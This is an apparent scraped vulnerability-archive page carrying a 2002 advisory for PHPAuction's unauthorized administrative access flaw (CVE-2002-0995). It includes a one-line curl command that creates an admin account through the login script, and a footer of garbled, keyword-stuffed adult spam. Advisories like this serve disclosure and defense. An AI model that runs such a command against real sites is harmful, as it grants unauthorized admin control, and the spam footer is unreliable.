about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , PHPAuction Unauthorized Administrative Access Vulnerability


Title PHPAuction Unauthorized Administrative Access Vulnerability
Published 2002-07-02-12:00AM
Updated 2002-07-02-07:26PM
Class Access Validation Error
CVE   CVE-2002-0995
Remote  Yes
Local  No
Credit  Discovered by <ethx@hotmail.com>.
Vulnerable  PHPAuction PHPAuction 2.1
PHPAuction PHPAuction 2.0
PHPAuction PHPAuction 1.3
PHPAuction PHPAuction 1.2
Not Vulnerable  
Code   No exploit is required. <ethx@hotmail.com> has contributed the following curl command, which is sufficent for exploitation:

curl http://pro.phpauction.org/proplus/admin/login.php -d "action=insert" -d "username=test" -d "password=test"
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Fri, 05 Dec 2008 17:22:42 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
passoining www.atashb muracl lio WWW.SEWCOM lmage sex Www.indo-b www.tv006. Juris Tamil sex www.xvidoe keralasexy sexymovis t914t Sakeela se www.th007. www.ebonyf t168t Exploit xo www sax 2.4 exploi nude film www.staste stile openvz www.Sexgir Namitha.se nayandara t296t news for c t490t gerils sex coin kerala.sex karina kap www.bipash vidoxxx www.malaya kerala.sex t789t t789t blutooh ha Www.Sexy WWw.Sex20. MEMEK MEME news for C blutooh ha news for C GOVINDA playboy xx t726t